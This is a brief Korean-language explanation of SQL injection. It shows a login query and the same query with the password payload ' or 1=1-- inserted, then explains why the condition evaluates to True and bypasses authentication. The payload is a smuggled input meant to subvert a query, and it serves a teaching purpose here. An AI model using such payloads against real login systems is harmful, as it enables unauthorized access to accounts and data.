예상 사용 SQL 문*
”SELECT FROM Members WHERE user_id = ‘id’ AND passwd = ‘pw’”;
예상 SQL 문 변화
”SELECT FROM Members WHERE user_id = ‘admin’ AND passwd = ‘’ or 1=1--’”;
user_id = ‘admin’ AND passwd = ‘’ ⇒ False
1=1 ⇒ True 이기 때문에
user_id = ‘admin’ AND passwd = ‘’ or 1=1 ⇒ FALSE or TRUE ⇒ True 가 나오게 된다

